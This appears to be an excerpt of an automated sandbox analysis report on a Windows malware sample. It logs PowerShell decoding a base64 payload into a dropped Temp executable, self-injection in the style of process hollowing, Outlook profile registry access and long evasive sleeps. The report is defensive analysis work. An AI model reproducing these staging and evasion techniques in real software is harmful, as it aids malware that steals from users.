Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: CZG3HF22.pdbH source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                      Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

                      Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
Source: x.exe.0.dr Static PE information: 0xB41A313D [Thu Oct 1 09:37:01 2065 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_053C13CD push ebx; iretd 0_2_053C13DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_053C5228 push esp; iretd 0_2_053C5241
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_08402C97 push esi; iretd 4_2_08402CEC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_084027B4 push esp; ret 4_2_084027B7
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_01889D22 push esp; ret 4_2_01889D23
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BEA088 pushad ; retf 0004h 5_2_00BEA0EA
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE9089 push ebx; retf 0004h 5_2_00BE908A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BEA0E8 pushad ; retf 0004h 5_2_00BEA0EA
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE8490 push edx; retf 0004h 5_2_00BE8EEA
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE8481 push ecx; retf 0004h 5_2_00BE8482
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE9468 push esi; retf A804h 5_2_00BE961A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE9459 push esi; retf 0004h 5_2_00BE945A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE9611 push edi; retf 0004h 5_2_00BE9612
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00BE9DE0 pushad ; retf 0004h 5_2_00BEA02A
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (97 identical entries)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 1880000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 3200000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 5200000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 58A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 68A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 69D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 79D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: BE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 4770000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599766
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599547
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599437
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599328
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599219
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599108
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599000
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598876
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598752
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598616
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598442
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598313
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598188
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598062
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597953
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597844
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597734
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597625
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597512
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597391
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597266
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597156
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597047
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596937
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596828
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596719
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596609
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596391
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596266
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596141
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 596007
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595893
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595721
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595575
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595448
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595328
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595219
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 595109
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594999
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594891
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594781
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594453
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594343
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594234
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 594125
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3248
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 526
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Window / User API: threadDelayed 7144
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Window / User API: threadDelayed 2698
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3840 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2236 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 432 Thread sleep count: 7144 > 30
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 432 Thread sleep count: 2698 > 30
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599547s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599108s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -599000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598876s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598752s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598616s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598442s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -598062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597512s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597266s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -597047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596937s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596266s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596141s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -596007s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595893s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595721s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595575s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595448s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -595109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594999s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748 Thread sleep time: -594125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594999Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594343Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594125Jump to behavior
                      Source: x.exe, 00000004.00000002.1318584955.000000000148D000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3754100392.0000000000C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
